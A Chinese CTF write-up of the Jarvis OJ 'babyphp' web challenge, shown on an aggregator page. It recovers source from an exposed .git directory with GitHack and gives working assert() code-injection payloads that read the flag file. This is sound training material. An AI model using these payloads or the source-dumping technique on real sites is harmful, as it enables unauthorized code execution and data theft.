CTF-WEB-babyphp #assert#git泄露

CTF-WEB-babyphp #assert#git泄露

作者: Watanuki | 来源:发表于2018-09-01 22:27 被阅读0次

CTF-WEB-babyphp #assert#git泄露
内存泄露系列文章（一） - 内存泄露原因及影响
内存泄露系列文章（三） - 内存泄露解决方案
Cursor泄露的处理
内存泄漏详细分析
解决几个常见内存泄露
内存溢出与内存泄露
熊国太歌词两首
Java弱引用学习 WeakHashMap、ReferenceQ
信息收集系列（三）

babyphp——61dctf{8e_careful_when_us1ng_ass4rt}

描述：

http://web.jarvisoj.com:32798/
昨儿做梦的时候我在梦里写了这个网站，印象中我用了这些东西:PHP，GIT，Bootstrap

分析：

猜测是git文件泄露但是不知道怎么找！扫描了一下目录看到http://web.jarvisoj.com:32798/.git，自己是肯定搞不定的还好我们有李姐姐！
git clone https://github.com/lijiejie/GitHack
python GitHack.py http://web.jarvisoj.com:32798/.git/
注意前面一定要有http，结尾也必须加上/。下下来后我们cat index.php看到：

    <?php
    if (isset($_GET['page'])) {
            $page = $_GET['page'];
    } else {
            $page = "home";
    }
    $file = "templates/" . $page . ".php";
    assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
    assert("file_exists('$file')") or die("That file doesn't exist!");
    ?>

分析代码可以得到：

需要传个page参数
file = "templates/" . $page . ".php"
通过assert函数进行了两次友好（）的判断回显，如果不符合假定，就执行or后面的语句

好的卡住了！搜了下发现这里的考点是assert，bool assert(mixed $assertion[,string $description])，如果assertion是字符串，他会被assert()当做php代码执行。
会!执!行!啊！

也是……人家都判断strpos和file_exists了，为什么不能执行phpinfo()！大家都是php函数，有谁比谁高贵（）
思路是通过可控变量file传入恶意参数，构造闭合 file_exists(),使assert()执行恶意代码。于是我们试探性的……

') or phpinfo();# ——即变成file_exists('') or phpinfo();# ，结果为执行phpinfo()，注意要url编码，本处为了方便阅读，以编码前显示
') or print_r(file_get_contents('templates/flag.php');# ——然后在源代码里（临门一脚不要被坑了）
即最终payload:?page=')%20or%20print_r(file_get_contents('templates%2fflag.php'))%3b%23

image.png

总结

今天的两个点我都不会！但是现在我都会了！谢谢李姐姐！（）

相关文章

CTF-WEB-babyphp #assert#git泄露
babyphp——61dctf{8e_careful_when_us1ng_ass4rt} 描述： http://...
内存泄露系列文章（一） - 内存泄露原因及影响
前言内存泄露系列文章内存泄露系列文章（一） - 内存泄露原因及影响内存泄露系列文章（二） - 内存泄露监测及分析...
内存泄露系列文章（三） - 内存泄露解决方案
前言内存泄露系列文章内存泄露系列文章（一） - 内存泄露原因及影响内存泄露系列文章（二） - 内存泄露监测及分析...
Cursor泄露的处理
cursor出现泄露时的log cursor泄露的检测解决cursor泄露 1. cursor出现泄露时的log...
内存泄漏详细分析
首先，什么是内存泄露？经常听人谈起内存泄露，但要问什么是内存泄露，没几个说得清楚。内存泄露是指无用对象（不再使用的...
解决几个常见内存泄露
1、解决了webview的内存泄露 2、解决了ConnectivityManager的内存泄露，类似的泄露还有Wi...
内存溢出与内存泄露
目录 [TOC] 1 内存泄露与内存溢出的区别 1.1 内存泄露内存泄露（Memory Leak），指的是堆内存...
熊国太歌词两首
泄露宇宙旋转了黑洞，泄露了太阳和星座。月亮像一个缺口，泄露了你我的传说。风吹来又拐了弯，泄露了空气的凝重。时光匆...
Java弱引用学习 WeakHashMap、ReferenceQ
上一篇文章 Java内存泄露学习 ThreadLocal真的会内存泄露吗提到ThreadLocal内存泄露的问题...
信息收集系列（三）
敏感信息泄露旁站、c段 waf探测敏感信息泄露 .hg源码泄露检测工具 dvcss-ripper .git源...

网友评论

本文标题：CTF-WEB-babyphp #assert#git泄露

本文链接：https://www.haomeiwen.com/subject/yafpwftx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

栏目导航

热点阅读

关于我们|服务条款|联系我们|CTF-WEB-babyphp #assert#git泄露|投稿指南|网站地图|RSS订阅|排版工具|手机版

提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网版权所有

备案信息：桂公网安备 45052102000051号 · 桂ICP备13007215号-3

本站所收录作品、热点评论等信息部分来源互联网，目的只是为了系统归纳学习和传递资讯

所有作品版权归原创作者所有，与本站立场无关，如不慎侵犯了你的权益，请联系我们告知，我们将做删除处理！